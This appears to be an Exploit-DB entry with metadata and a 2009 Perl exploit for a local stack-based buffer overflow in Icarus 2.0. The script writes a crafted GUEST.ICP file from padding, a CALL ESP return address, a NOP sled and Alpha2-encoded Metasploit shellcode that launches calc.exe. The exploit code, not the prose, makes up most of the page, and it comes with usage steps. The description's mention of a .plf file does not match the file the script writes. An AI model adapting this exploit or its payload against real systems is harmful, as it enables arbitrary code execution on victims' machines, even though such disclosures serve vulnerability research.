Icarus 2.0 Local Stack-based Buffer Overflow Exploit

vendor:

Icarus 2.0

by:

[0]x80->[H]4xÂ²0r

7,8

CVSS

HIGH

Stack-based Buffer Overflow

119

CWE

Product Name: Icarus 2.0

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:icarus:icarus_2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Icarus 2.0 Local Stack-based Buffer Overflow Exploit

Icarus 2.0 is vulnerable to a stack-based buffer overflow vulnerability. The vulnerability is triggered when a maliciously crafted .plf file is loaded into the application. This can be exploited to execute arbitrary code by overwriting the saved return address with the address of the malicious code. The exploit code generates a malicious .plf file which contains a shellcode encoded with Alpha2.

Mitigation:

Update to the latest version of Icarus 2.0

Source

Exploit-DB raw data:

#!/usr/bin/perl
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
# Icarus 2.0  Local Stack-based Buffer overflow Exploit             			     #
# By : [0]x80->[H]4xÂ²0r									     #
# Contact : hashteck[at]Gmail[dot]com						             #
# From : Morocco									     #
# PoC by : ThE g0bL!N									     #
#[+]--------------------------------------------------------------------------------------[+]#
# Program : Icarus 2.0  								     #
#[+]--------------------------------------------------------------------------------------[+]#
# Tested Under Win$hit 6.0 Vista Pro							     #
#[+]--------------------------------------------------------------------------------------[+]#
##############################################################################################
#####################################  Proud to be HACKER  ###################################
##############################################################################################
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
#											     #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
# Put the file generated by this exploit in Icarus Directory ( After you made a back up of   #
# the original file ) then launch Icarus.exe and b000m , calc.exe is launched                #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
#											     #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
# Note : The shellcode is encoded with Alpha2 . The program don't accept non-encoded 	     #
# Shellcode . I'm too lazy to figure that out now , i you find something contact me !	     #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#


$Header="server=" ;
$junk="\x41" x 528;
$EIP = "\x28\x55\x3D\x72"; # 0x723D5528 -- DSOUND.DLL -- CALL ESP
$NOPS = "\x90" x 20 ;
# win32_exec -  EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
$shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a".
"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x41\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x79\x6c\x4b".
"\x58\x71\x54\x53\x30\x65\x50\x35\x50\x4e\x6b\x33\x75\x67\x4c\x6e".
"\x6b\x51\x6c\x33\x35\x50\x78\x66\x61\x5a\x4f\x6e\x6b\x50\x4f\x32".
"\x38\x6c\x4b\x33\x6f\x41\x30\x35\x51\x48\x6b\x37\x39\x6c\x4b\x45".
"\x64\x6e\x6b\x56\x61\x7a\x4e\x56\x51\x6f\x30\x4c\x59\x4e\x4c\x4b".
"\x34\x4f\x30\x50\x74\x57\x77\x48\x41\x39\x5a\x76\x6d\x33\x31\x79".
"\x52\x6a\x4b\x6b\x44\x37\x4b\x42\x74\x74\x64\x55\x54\x50\x75\x6b".
"\x55\x4c\x4b\x61\x4f\x67\x54\x46\x61\x6a\x4b\x52\x46\x6e\x6b\x74".
"\x4c\x50\x4b\x4c\x4b\x53\x6f\x45\x4c\x76\x61\x38\x6b\x6e\x6b\x77".
"\x6c\x6c\x4b\x75\x51\x38\x6b\x6f\x79\x61\x4c\x54\x64\x75\x54\x6b".
"\x73\x56\x51\x4f\x30\x33\x54\x6e\x6b\x53\x70\x36\x50\x4c\x45\x6f".
"\x30\x53\x48\x54\x4c\x4c\x4b\x71\x50\x66\x6c\x6c\x4b\x32\x50\x47".
"\x6c\x6e\x4d\x4c\x4b\x70\x68\x45\x58\x7a\x4b\x77\x79\x4c\x4b\x6f".
"\x70\x4c\x70\x67\x70\x35\x50\x37\x70\x4c\x4b\x43\x58\x77\x4c\x43".
"\x6f\x74\x71\x59\x66\x63\x50\x42\x76\x6c\x49\x6a\x58\x4d\x53\x59".
"\x50\x61\x6b\x50\x50\x71\x78\x63\x4e\x48\x58\x39\x72\x51\x63\x32".
"\x48\x4f\x68\x4b\x4e\x6e\x6a\x46\x6e\x61\x47\x4b\x4f\x6a\x47\x73".
"\x53\x62\x41\x42\x4c\x55\x33\x67\x70\x4a";
#
#
#
open(myfile,'>>GUEST.ICP');
print myfile $Header.$junk.$EIP.$NOPS.$shellcode;

#----------------------------------------------------------------------------------#
# Welcome back Milw0rm & tnx to str0ke for his great j0b !!!11111oneleven11!!
#----------------------------------------------------------------------------------#

# milw0rm.com [2009-07-14]